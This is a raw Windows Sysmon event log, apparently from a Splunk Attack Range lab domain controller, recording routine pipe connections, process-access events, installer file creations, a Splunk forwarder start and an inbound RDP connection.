14:58:05.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.607{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.592{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI70B0.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000078004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.679{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-3588-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000078003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.545{A7A01FEF-EBFD-607E-190E-00000000BB01}7361108C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000077991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.498{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI6FD4.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 18141800x800000000000000077990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.467{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFD-607E-1B0E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.451{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFD-607E-1B0E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.451{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFD-607E-1B0E-00000000BB01}5360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.420{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFD-607E-1A0E-00000000BB01}6676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.420{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFD-607E-1A0E-00000000BB01}6676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.420{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFD-607E-1A0E-00000000BB01}6676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000077980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.373{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=A15B38451042AADB262392757F247E92,SHA256=CC4B62A9636F4413394D9549503001A2D8E55CEEACD37E330C10D086E2C69A08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000077979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.373{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBFD-607E-190E-00000000BB01}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.373{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.373{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.373{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.373{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.373{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBFD-607E-190E-00000000BB01}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.373{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBFD-607E-190E-00000000BB01}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000077972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.234{A7A01FEF-EBFD-607E-190E-00000000BB01}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000077971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000077969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000077968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 